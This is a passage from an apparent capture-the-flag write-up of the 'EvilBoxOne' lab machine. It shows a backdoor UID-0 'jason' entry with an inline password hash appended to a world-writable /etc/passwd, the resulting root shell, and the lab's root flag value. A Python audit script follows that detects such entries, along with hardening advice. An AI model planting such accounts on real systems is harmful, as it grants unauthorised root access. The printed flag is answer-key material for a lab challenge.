irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash

Then switch to the jason user; because its UID is 0, it has root privileges:

mowree@EvilBoxOne:/tmp$ su jason
Contraseña: 
root@EvilBoxOne:/tmp# cd /root
root@EvilBoxOne:~# ls -alh
total 24K
drwx------  3 root root 4,0K ago 16  2021 .
drwxr-xr-x 18 root root 4,0K ago 16  2021 ..
lrwxrwxrwx  1 root root    9 ago 16  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3,5K ago 16  2021 .bashrc
drwxr-xr-x  3 root root 4,0K ago 16  2021 .local
-rw-r--r--  1 root root  148 ago 17  2015 .profile
-r--------  1 root root   31 ago 16  2021 root.txt
root@EvilBoxOne:~# cat root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM
root@EvilBoxOne:~# 
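The whole escalation rests on a world-writable /etc/passwd, and the resulting file carries two tell-tale signs: a second UID-0 account and a SHA-512 hash stored in passwd instead of shadow. The following is an added example (not from the original post) of an audit that checks a passwd file's mode, owner and entries for exactly these conditions; SAMPLE_PASSWD is a constructed, abridged copy of the file shown above, and audit_passwd_file() is a hypothetical helper for running it against a live host.

```python
import os
import stat

# Constructed /etc/passwd content: an abridged copy of the file from this
# walkthrough, including the appended "jason" entry with UID 0 and an inline hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash
"""

# Values that mean "look in /etc/shadow" or "locked"; anything else in field 2
# is a hash that bypasses shadow protection entirely.
SHADOWED = {"x", "*", "!", "!!"}


def audit_passwd(text, mode=0o644, owner_uid=0):
    """Audit passwd content plus its permission bits; returns (severity, message) pairs."""
    findings = []
    # linpeas flagged "/etc/passwd is writable" on this box: that is the root cause.
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(("critical", f"passwd is group/world writable (mode {oct(mode)})"))
    if owner_uid != 0:
        findings.append(("critical", f"passwd owned by uid {owner_uid}, not root"))
    seen = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("warning", f"line {lineno}: malformed entry with {len(fields)} fields"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if name in seen:
            findings.append(("high", f"line {lineno}: duplicate user name '{name}'"))
        seen.add(name)
        if not uid.isdigit():
            findings.append(("warning", f"line {lineno}: non-numeric uid for '{name}'"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append(("critical", f"line {lineno}: '{name}' has uid 0 (root-equivalent)"))
        if pw == "":
            findings.append(("high", f"line {lineno}: '{name}' has an empty password field"))
        elif pw not in SHADOWED:
            findings.append(("high", f"line {lineno}: '{name}' carries a password hash in passwd, not shadow"))
    return findings


def audit_passwd_file(path="/etc/passwd"):
    """Run the audit against a real file, taking mode and owner from stat()."""
    st = os.stat(path)
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read(), mode=stat.S_IMODE(st.st_mode), owner_uid=st.st_uid)


if __name__ == "__main__":
    # mode 0o666 mirrors the "writable passwd" finding linpeas reported on this box
    for severity, message in audit_passwd(SAMPLE_PASSWD, mode=0o666):
        print(f"[{severity}] {message}")
```

The fix is `chmod 644 /etc/passwd` plus removing the extra entry; an integrity monitor (AIDE, auditd watch on /etc/passwd) would have caught the write the moment nano saved the file.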

posted @ 2023-01-11 16:24 Jason_huawen